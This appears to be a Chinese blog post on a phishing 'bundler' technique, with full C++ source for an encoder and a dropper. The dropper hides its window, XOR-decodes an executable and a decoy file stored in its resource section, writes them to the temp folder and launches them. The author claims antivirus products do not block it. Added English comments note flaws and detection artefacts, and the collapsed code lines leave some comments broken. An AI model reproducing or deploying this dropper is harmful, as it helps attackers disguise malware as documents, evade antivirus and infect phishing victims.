文章目录
- 前记
- 浅谈原理
- 代码汇总
- 后记
- reference
前记
看到奇安信某篇钓鱼捆绑技术的文章后得到启发,于是开始学习探索
浅谈原理
将exe和pdf或者其他格式的文件写到资源节中,执行捆绑文件的时候动态获取并解密资源节的内容保存到磁盘的tmp目录,最后执行保存到磁盘的文件即可
代码汇总
加密文件
#include<windows.h>
#include <iostream>
using namespace std;
// Encoder half of the bundler.  Reads the file named on the command line
// (argv[1]), XORs every byte with the byte stream produced by srand(100) /
// rand() % 255 + 1, and writes the result to "sec.txt" in the current
// directory.  The "encryption" is therefore a fixed-key XOR whose key is fully
// determined by the literal seed `r` (the same literal is hard-coded in the
// bundler that decodes it) -- it only hides static signatures and is
// trivially reversible by anyone who reads the seed out of either binary.
// No argument-count, handle or allocation checks are performed; `size` is a
// DWORD64 but GetFileSize(file, NULL) only yields the low 32 bits, and the
// `aaa` error code is captured but never used.
// NOTE: the page extraction collapsed the body onto a single line, so the
// `//1-255` line comment inside the loop now runs to the end of that line as
// shown here.
int main(int argc, char* argv[])
{int r = 100;HANDLE file = CreateFileA(argv[1], GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);DWORD64 size = GetFileSize(file, NULL);char* bytes =(char*) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, size);ReadFile(file, bytes, size, NULL, NULL);HANDLE file2 = CreateFileA("sec.txt", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);LPVOID res = bytes;int b;DWORD64 c = size;srand(r);while (c--) {b = rand() % 255 + 1;//1-255*bytes^= b;bytes++;}if (!WriteFile(file2, res, size, NULL, NULL)) {std::cerr << "Error writing to file" << std::endl;DWORD aaa=GetLastError();return 1;}CloseHandle(file2);CloseHandle(file);return 0;
}
捆绑文件
#include <iostream>
// Fixed seed for the XOR key stream.  It must equal the `r` used by the
// encoding tool (`int r = 100` there); because it is a plain literal it is
// recoverable from the binary, so the payload offers no confidentiality.
#include <windows.h>int r=100;
using namespace std;
// `num` (file scope): counts the resource types seen so far by the
// EnumResourceTypes callback; the payload for the N-th type is looked up as
// resource ID 100 + N.
// getreal: decodes `num` bytes from src into dest by XORing each byte with
// the srand(r) / rand() % 255 + 1 stream the encoder used.  The `num`
// parameter shadows the file-scope counter inside this function.  No bounds
// or null checks; dest must already hold `num` bytes.
// NOTE: the page extraction collapsed the body onto a single line, so the
// `//1-255` line comment now runs to the end of that line as shown here.
static int num = 0;void getreal(char *dest,char *src, DWORD num)
{int b;srand(r);while (num--) {b = rand() % 255 + 1;//1-255*dest++ = *src++^b;}
}
// Hides whatever window is currently in the foreground.  When a console build
// is launched from Explorer that is presumably this process's own console, but
// GetForegroundWindow is not tied to the calling process, so whichever window
// the user has in front at that instant is hidden instead.  From a detection
// standpoint, a process hiding its console right at start-up is a common
// dropper trait worth alerting on.
void HideWindow() {HWND hwnd = GetForegroundWindow();if (hwnd) {ShowWindow(hwnd, SW_HIDE);}
}
// EnumResourceTypes callback: invoked once per resource type found in this
// executable's own module (hModule is ignored; NULL is passed everywhere).
// Per call:
//   1. num++ and convert the type name (lpType) from wide to narrow (CP_OEMCP).
//      The type name is reused verbatim as the dropped file's extension, which
//      is why the author notes the literal "exe" string may be flagged.
//      NOTE(review): for standard types lpType may be an integer ID
//      (MAKEINTRESOURCE) rather than a string; WideCharToMultiByte would then
//      dereference it as a pointer -- that case is not handled here.
//   2. FindResourceA(100 + num, fileType) / LoadResource / LockResource give
//      the obfuscated payload bytes and their size.
//   3. Output name = this executable's base name with its last extension
//      replaced by "." + fileType (replace(rfind('.'), 4, ...) assumes a
//      three-character original extension), placed under GetTempPathA.
//   4. getreal() decodes the bytes into a heap buffer, WriteFile writes them to
//      %TEMP%, Sleep(500), then ShellExecuteExA opens the file with the default
//      handler for its extension.
// Neither `fileType` nor `real` is freed, and none of the handles or resource
// lookups are checked for failure.
// Artefacts for detection / IR: a file in %TEMP% named after the bundler with
// a resource-type-name extension, a child process started via ShellExecuteEx
// from that path, and a PE whose resource section carries opaque blobs under
// custom type names.
// main (below): hides the console window, then drives the callback over every
// resource type.  The cast to ENUMRESTYPEPROC suppresses any signature
// mismatch (the documented callback returns BOOL and takes a LONG_PTR lParam).
void EnumTypesFunc(HMODULE hModule, LPTSTR lpType, LPTSTR lParam) {num++;DWORD dwNum = WideCharToMultiByte(CP_OEMCP, NULL, lpType, -1, NULL, 0, NULL, FALSE);char* fileType =new char[dwNum];WideCharToMultiByte(CP_OEMCP, NULL, lpType, -1, fileType, dwNum, NULL, FALSE);CHAR PathFileName[MAX_PATH] = { 0 };CHAR FileName[MAX_PATH] = { 0 };HRSRC Resource = FindResourceA(NULL, MAKEINTRESOURCEA(100 + num), fileType);HGLOBAL ResourceGlobal = LoadResource(NULL, Resource);DWORD FileSize = SizeofResource(NULL, Resource);LPVOID PFILE = LockResource(ResourceGlobal);GetModuleFileNameA(NULL, PathFileName, MAX_PATH);strcpy_s(FileName, strrchr(PathFileName, '\\') + 1);string FileNameFinal = FileName;FileNameFinal.replace(FileNameFinal.rfind('.'), 4, "." + string(fileType));CHAR czTempPath[MAX_PATH] = { 0 };GetTempPathA(MAX_PATH, czTempPath);FileNameFinal = czTempPath + FileNameFinal;strcpy_s(FileName, FileNameFinal.c_str());HANDLE FILE = CreateFileA(FileName, FILE_ALL_ACCESS, 0, NULL, CREATE_ALWAYS, 0, NULL);DWORD dwSize;char *real= new char[FileSize];getreal(real,(char *)PFILE,FileSize);WriteFile(FILE, real, FileSize, &dwSize, NULL);CloseHandle(FILE);Sleep(500);SHELLEXECUTEINFOA shellexecute = { 0 };shellexecute.cbSize = sizeof(shellexecute);shellexecute.lpFile = FileName;shellexecute.nShow = SW_SHOW;ShellExecuteExA(&shellexecute);
}int main(int argc, char* argv[])
{HideWindow();EnumResourceTypes(NULL,(ENUMRESTYPEPROC)EnumTypesFunc,0);
}
因为对资源节内容进行了加密,所以这里资源节里完全没有PE特征
后记
由于解析文件后缀依靠填写的文件真实格式,因此可能被杀软检测到资源节的exe关键字,建议宏定义或者加密处理(懒得改代码了)。经过测试杀软均不拦截且正常运行,当然如果exe文件落地后报毒则和捆绑本身操作无关
reference
https://forum.butian.net/share/1778
https://github.com/testxxxzzz/Bundler-bypass/blob/main/Bundler_C/main.cpp